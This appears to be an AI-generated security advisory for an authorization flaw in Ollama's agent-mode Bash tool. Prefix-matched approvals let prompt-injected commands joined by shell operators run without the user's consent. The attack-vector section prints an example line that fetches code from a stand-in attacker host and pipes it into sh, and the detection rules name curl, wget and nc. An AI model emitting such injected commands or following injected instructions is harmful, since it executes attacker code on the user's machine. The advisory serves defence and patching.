CVE-2026-102697 Overview
CVE-2026-102697 is an incorrect authorization vulnerability [CWE-863] in Ollama's experimental agent mode Bash tool. The approval mechanism fails to properly parse shell syntax before comparing commands against the approved list. Attackers who can influence model output through prompt injection can append shell control operators such as semicolons, &&, or || to approved commands. These appended commands execute without user approval, bypassing the session approval requirement entirely.
The flaw affects Ollama versions 0.14.0 through 0.31.1 and is fixed in 0.31.2. The vulnerability arises from prefix-based authorization in the approval logic rather than full shell command parsing.
Critical Impact
An attacker who controls model output can execute arbitrary shell commands on the host running Ollama agent mode, achieving local code execution under the user account running the agent.
Affected Products
- Ollama 0.14.0 through 0.31.1 (experimental agent mode)
- Ollama Bash tool approval mechanism in x/agent/approval.go
- Fixed in Ollama 0.31.2
Discovery Timeline
- 2026-09-29 - CVE-2026-102697 published to NVD
- 2026-09-29 - Last updated in NVD database
Technical Details for CVE-2026-102697
Vulnerability Analysis
Ollama's experimental agent mode provides a Bash tool that lets a language model execute shell commands on the host. To limit risk, the tool requires user approval for each command and caches approvals for the session. The approval check in x/agent/approval.go compares the requested command against the approved set using string prefix matching rather than shell-aware parsing.
When the model requests a command that starts with an approved string, the tool executes the entire command line. An attacker who influences model output through prompt injection can append additional commands using shell control operators. The result is arbitrary command execution under the identity of the process running Ollama agent mode.
Root Cause
The root cause is prefix-based authorization without lexical analysis of the shell command. The approval logic at lines 204-206 and line 389 of approval.go in v0.31.1 treats the command string as opaque text. Shell metacharacters such as ;, &&, ||, backticks, and $() are not tokenized, so any content following an approved prefix rides along with approval.
Attack Vector
Exploitation requires local execution of Ollama agent mode and a user who has approved at least one benign command such as ls. Through prompt injection in untrusted context — for example, a fetched web page, a file the agent reads, or a repository the agent processes — the attacker instructs the model to emit a command like ls; curl http://attacker/x | sh. The approval check matches the ls prefix, and the shell then executes both statements.
The following patch introduces a structured agent harness that replaces the fragile prefix-based approval flow with explicit Tool and ApprovalRequired interfaces:
+package agent
+
+import (
+ "context"
+ "fmt"
+ "sort"
+
+ "github.com/ollama/ollama/api"
+)
+
+type ToolContext struct {
+ WorkingDir string
+}
+
+type ToolResult struct {
+ Content string
+ WorkingDir string
+}
+
+type Tool interface {
+ Name() string
+ Description() string
+ Schema() api.ToolFunction
+ Execute(context.Context, ToolContext, map[string]any) (ToolResult, error)
+}
+
+type ApprovalRequired interface {
+ RequiresApproval(map[string]any) bool
+}
Source: Ollama commit a2b3a5e
Detection Methods for CVE-2026-102697
Indicators of Compromise
- Shell processes spawned by the Ollama agent binary that include control operators such as ;, &&, ||, backticks, or $() in the argument vector.
- Outbound network connections from child processes of Ollama agent mode to unfamiliar hosts shortly after tool calls.
- Unexpected file writes, cron entries, or SSH key modifications originating from the user account running Ollama.
Detection Strategies
- Monitor process creation events where the parent process is the Ollama agent and the child is bash, sh, or another shell interpreter with compound command lines.
- Alert on execution of network utilities such as curl, wget, or nc as descendants of the Ollama agent process.
- Inspect agent session logs for tool call arguments containing shell metacharacters concatenated to previously approved commands.
Monitoring Recommendations
- Enable command-line auditing (Linux auditd execve, Windows Sysmon Event ID 1, macOS ES process events) on hosts running Ollama agent mode.
- Correlate model prompt sources (fetched URLs, files ingested) with subsequent Bash tool invocations to identify prompt injection attempts.
- Track installed Ollama versions across the environment and flag any host below 0.31.2.
How to Mitigate CVE-2026-102697
Immediate Actions Required
- Upgrade Ollama to version 0.31.2 or later on every host that runs agent mode.
- Disable experimental agent mode on hosts that do not require it until the upgrade is applied.
- Revoke session approvals and restart any long-running Ollama agent sessions after upgrading.
Patch Information
The fix ships in Ollama release v0.31.2 via commit a2b3a5e, which restructures the agent harness and replaces prefix-based approval with a typed Tool and ApprovalRequired interface model. Additional context is available in the VulnCheck advisory.
Workarounds
- Run Ollama agent mode inside an isolated container or virtual machine with no sensitive data, credentials, or network access to internal resources.
- Restrict the Ollama process to a dedicated low-privilege user account with no sudo rights and a minimal PATH.
- Avoid approving any command in agent mode when processing untrusted content until the host is patched.
# Verify installed Ollama version and upgrade if below 0.31.2
ollama --version
# Example: run agent mode inside a rootless container with no host mounts
docker run --rm -it \
--network none \
--user 1000:1000 \
--read-only \
--cap-drop=ALL \
ollama/ollama:0.31.2
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.